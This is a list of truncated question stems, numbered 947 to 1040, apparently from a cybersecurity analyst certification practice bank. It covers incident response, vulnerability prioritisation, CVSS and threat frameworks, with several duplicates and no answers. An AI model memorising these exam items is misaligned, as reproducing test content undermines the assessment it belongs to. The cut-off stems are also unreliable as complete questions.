  947. An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
  948. Which of the following is the best technical method to protect sensitive data at an organizational level?
  949. A security analyst needs to identify an asset that should be remediated based on the following information. Which of the following assets should the analyst rem ...
  950. A Chief Information Security Officer has requested a dashboard to share critical vulnerability management goals with company leadership. Which of the following ...
  951. An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the docu ...
  952. A security manager has decided to form a special group of analysts who participate in both penetration testing and defending the company's network infrastructur ...
  953. A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
  954. Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident re ...
  955. A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
  956. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
  957. A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instance ...
  958. A cybersecurity analyst receives an unstructured text document that contains advanced persistent threat (APT)-related indicators of compromise (IoCs). The analy ...
  959. An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Wh ...
  960. A security analyst is identifying vulnerabilities in laptops. Users often take their laptops out of the office while traveling, and the vulnerability scan metri ...
  961. Which of the following will inhibit remediation when attempting to resolve a vulnerability?
  962. A vendor releases details of a new vulnerability. When an analyst reviews the scheduled scans, no vulnerabilities are identified. The vulnerability is only disc ...
  963. An organization’s server policies include the following requirements. Based on the scan output, which of the following hosts is violating the organization’s pol ...
  964. A web developer reports the following error that appeared on a development server when testing a new application. Which of the following tools can be used to id ...
  965. An analyst wants to detect outdated software packages on a server. Which of the following methodologies will achieve this objective?
  966. An analyst uses an AI platform to help correlate events. The AI output contains events that did not happen. This results in inaccurate correlations. Which of th ...
  967. A company completes a System and Organization Controls 2 (SOC 2) readiness assessment. The Chief Information Security Officer (CISO) makes the control owner res ...
  968. An organization has tracked several incidents that are listed in the following table. Which of the following is the organization’s MTTD?
  969. Which of the following activities during the preparation phase of the incident response process supports the detection phase?
  970. The security team reviews a web server for XSS and runs the following Nmap scan. Which of the following most accurately describes the result of the scan?
  971. An analyst wants to track how quickly vulnerabilities are identified. Which of the following would be the best metric?
  972. An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
  973. A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of th ...
  974. A security analyst identifies a device on which different malware was detected multiple times even after the systems were scanned and cleaned several times. Whi ...
  975. A cybersecurity analyst is recommending a solution to ensure emails that contain links or attachments are tested before they reach a mail server. Which of the f ...
  976. A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
  977. Which of the following is the most important reason a company would use APIs instead of scripts to enable communication between tools from different vendors?
  978. Which of the following security operations tasks are ideal for automation?
  979. A team lead asks an analyst to integrate multiple security tools to provide an enhanced view into data that is not readily available in the tool console. Which ...
  980. A company's internet-facing web application has been compromised several times due to identified design flaws. The company wants to minimize the risk of recurre ...
  981. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which option best explains how the analyst should pro ...
  982. An analyst wants to detect outdated software packages on a server. Which methodology will achieve this objective?
  983. An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which should the analyst focus on to move the incident ...
  984. Which of the following is the most important reason a company would use APIs instead of scripts to enable communication between tools from different vendors?
  985. A vulnerability analyst runs a credentialed vulnerability scan across all enterprise assets and finds many critical vulnerabilities that cannot be immediately r ...
  986. A security analyst identifies a device where different malware continues to be detected multiple times even after repeated scans and cleanings. Which action wou ...
  987. Which phase of the incident response process will permanently remove an attacker's access to corporate resources?
  988. A security analyst needs to identify which asset should be remediated first based on the provided CVSS scores. Which asset should be prioritized?
  989. Which of the following best describes root cause analysis?
  990. A web developer reports an error on a development server while testing a new application. Which tool can be used to identify the application's point of failure?
  991. Which of the following choices is most likely to cause obstacles in vulnerability remediation?
  992. Which of the following is the most difficult for threat actors to change according to the Pyramid of Pain model?
  993. Which of the following best describes a company's risk appetite?
  994. A security analyst wants to integrate two different SaaS-based security tools so one can notify the other when a threat is detected. What should be used to best ...
  995. An MSSP received several alerts from customer 1, causing a missed incident response deadline for customer 2. Which document was violated?
  996. The security team reviews a web server for XSS and runs an Nmap scan. Which option most accurately describes the result?
  997. A security analyst reviews MFA logs showing multiple successful MFA logins for a user from different geographic locations within short timeframes. Which events ...
  998. During an internal code review, software called “ACE” was found to have a vulnerability allowing arbitrary code execution in a legacy third-party vendor resourc ...
  999. Which of the following is the main concept behind the use of an attack methodology framework?
  1000. An analyst sees that a previously remediated vulnerability has reappeared on a database server. What is the most likely cause?
  1001. An employee is suspected of misusing a company-issued laptop and has been suspended pending an HR investigation. What is the best step to preserve evidence?
  1002. A SOC analyst reviews SIEM logs showing failed logins, a successful login, a password change, and the user being added to the enterprise admin group. Which atta ...
  1003. A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and identify URLs that should be denied access prior to d ...
  1004. A security analyst is identifying vulnerabilities on laptops that frequently leave the office, causing inaccurate scan metrics. Which change should be proposed ...
  1005. When migrating multiple SaaS applications to the cloud, which service model would have reduced the complexity of extending identity and access management to clo ...
  1006. A security analyst is assessing a cloud environment and receives an authentication error indicating the instance was not found in the preset location. What shou ...
  1007. A Chief Information Security Officer wants a dashboard to share critical vulnerability management goals with company leadership. What should be included?
  1008. Based on the vulnerability scan results and asset context, what would the vulnerability team most likely do to determine remediation prioritization?
  1009. A malicious actor has gained access to an internal network via social engineering and wants to maintain access to continue the attack. Which stage of the Cyber ...
  1010. An incident response team found IoCs on a critical server and needs to isolate it. Which data should be collected first to preserve sensitive information before ...
  1011. Which of the following is the best technical method to protect sensitive data at an organizational level?
  1012. Using open-source intelligence from technical forums, a threat actor compiles and tests a malicious downloader to evade endpoint detection. Which Cyber Kill Cha ...
  1013. A SOC receives multiple alerts related to a cloud tenant and needs to identify the initial compromise. What should the analyst do first?
  1014. Which of the following hosts is violating the organization's server policies?
  1015. An organization wants to ensure its cloud infrastructure has a hardened configuration by creating a secure server image template. Which resource is best to ensu ...
  1016. A SOC manager reviewed findings from the last tabletop exercise to identify strengths and weaknesses and make improvements. What should be used to improve the p ...
  1017. A cybersecurity analyst wants emails with links or attachments to be tested before reaching the mail server. What will the analyst most likely recommend?
  1018. A SOC analyst finds the following in debugger output for a client-server application. What is the most likely vulnerability?
  1019. Which of the following best explains the importance of playbooks for incident response teams?
  1020. An analyst reviews CVSS v3.1 metrics for a critical zero-day vulnerability. Which option represents the exploit code maturity?
  1021. An analyst wants to track how quickly vulnerabilities are identified. Which metric is best?
  1022. A security manager wants a group of analysts who participate in both penetration testing and defending the company’s network during exercises. Which team should ...
  1023. A threat intelligence analyst updates a document using the MITRE ATT&CK framework and notes the behavior: “The malicious actor will attempt to achieve unauthori ...
  1024. An incident responder recovered a binary file from network traffic and found it on multiple machines with anomalous behavior. Which process would most likely be ...
  1025. An organization wants to establish a disaster recovery plan for critical on-premises applications. What is the first step to prepare for this requirement?
  1026. Which of the following security operations tasks are ideal for automation?
  1027. Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident re ...
  1028. A server was recently compromised. Which artifact should be collected first before disconnecting the server from the network?
  1029. A vulnerability analyst must choose which vulnerabilities to remediate based on CVSS 3.1 base scores. Which represents the least impactful risk?
  1030. Which metric should be used to measure the degree to which a system, application, or user base is affected by an uptime availability outage?
  1031. Which of the following provides the most granular controls for a given tactic or technique?
  1032. During an investigation, an analyst discovers a host is infected with malware and wants to prevent its spread while still allowing further investigation. What i ...
  1033. A SOC analyst runs the following command to display specific traffic: $ tshark -r file.pcap -Y "http or udp" What will the command display?
  1034. A CVE is exploitable only on shared physical or logical network resources and cannot traverse a Layer 3 (OSI) boundary. Which attack vector most likely applies?
  1035. An analyst is configuring a SIEM to capture fileless malware execution events. Which log file requires additional configuration to accomplish this?
  1036. A vulnerability management team conducts a scan on an IP address showing suspicious behavior. What is the first step toward remediation?
  1037. Which of the following describes a risk that exists before implementing security controls?
  1038. After a risk analysis, a company purchases cybersecurity insurance. Which type of risk management strategy is this?
  1039. An incident response manager conducts a tabletop exercise. Which step should be taken next?
  1040. An incident response manager conducts a tabletop exercise. Which step should be taken next?